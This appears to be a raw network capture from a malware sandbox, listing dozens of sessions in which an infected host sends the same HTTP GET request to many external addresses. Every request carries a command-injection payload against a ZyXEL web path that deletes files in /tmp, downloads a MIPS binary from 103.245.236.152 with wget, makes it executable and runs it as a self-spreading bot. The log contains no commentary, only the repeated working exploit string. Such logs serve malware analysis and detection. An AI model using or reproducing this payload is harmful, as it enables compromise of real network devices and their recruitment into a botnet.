                                          Jan 14, 2024 15:46:17.013566971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4579192.168.2.2340166201.212.50.175443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013587952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4580192.168.2.233656088.135.102.131443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013636112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4581192.168.2.2333220144.45.193.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013660908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4582192.168.2.234493257.194.13.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013689041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4583192.168.2.2335662148.35.121.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013735056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4584192.168.2.235041468.141.61.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013741016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4585192.168.2.2351332132.145.173.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013776064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4586192.168.2.2340750216.67.56.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013780117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4587192.168.2.2355840141.252.158.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013813972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4588192.168.2.2357120109.182.78.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013871908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4589192.168.2.2343988108.176.111.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013900042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4590192.168.2.235717641.152.54.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013912916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4591192.168.2.23378401.61.114.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013942003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4592192.168.2.2343340221.137.191.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013963938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4593192.168.2.2357396143.83.61.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.014009953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4594192.168.2.2348416154.141.3.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.014020920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4595192.168.2.233398618.191.247.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.014050961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4596192.168.2.2352842210.175.76.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.014069080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4597192.168.2.2337256136.153.74.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.014113903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4598192.168.2.2355436124.79.244.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.014146090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4599192.168.2.2346118206.18.221.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.014156103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4600192.168.2.234143645.178.110.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.014193058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4601192.168.2.2336430156.155.169.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.014219046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4602192.168.2.2336098145.254.52.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.014250040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4603192.168.2.233515089.142.235.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.014286041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4604192.168.2.2354724113.125.83.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.030698061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4605192.168.2.2347472133.14.241.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.030847073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4606192.168.2.234181878.119.2.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.030859947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4607192.168.2.2335080195.101.9.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.030890942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4608192.168.2.233775098.243.38.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.030930996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4609192.168.2.2343232104.115.176.137443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.030972004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4610192.168.2.2356086147.53.10.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031040907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4611192.168.2.2351268177.12.2.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031065941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4612192.168.2.2346096133.93.250.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031110048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4613192.168.2.233678853.117.5.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031146049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4614192.168.2.234867439.234.155.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031191111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4615192.168.2.2338994150.37.103.121443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031218052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4616192.168.2.2341128154.207.109.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031244040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4617192.168.2.235984086.160.56.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031291962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4618192.168.2.2352610118.37.58.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031316042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4619192.168.2.235849024.112.5.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031354904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4620192.168.2.234788682.214.15.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031408072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4621192.168.2.23361149.39.44.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031434059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4622192.168.2.2336268176.172.174.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031434059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4623192.168.2.2334616119.36.58.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031506062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4624192.168.2.235001239.102.146.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031548977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4625192.168.2.2332800223.60.203.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031574011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4626192.168.2.2335906133.171.237.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031649113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4627192.168.2.233594261.19.62.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031723976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4628192.168.2.2343962197.14.207.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031763077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4629192.168.2.234436652.105.149.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031814098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4630192.168.2.2353750147.229.180.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031852007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4631192.168.2.2346144131.163.112.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031879902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4632192.168.2.234889677.208.163.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031913042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4633192.168.2.2336150122.191.241.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031960011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4634192.168.2.2333416125.74.136.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.031985998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4635192.168.2.2351522139.24.41.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032016039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4636192.168.2.2341034140.57.43.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032082081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4637192.168.2.2339966155.112.101.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032116890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4638192.168.2.2351820130.59.131.253443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032160044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4639192.168.2.2356744221.116.234.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032160044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4640192.168.2.2357038121.88.40.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:18.032222033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4641192.168.2.2354580178.192.242.207443
                                          TimestampBytes transferredDirectionData
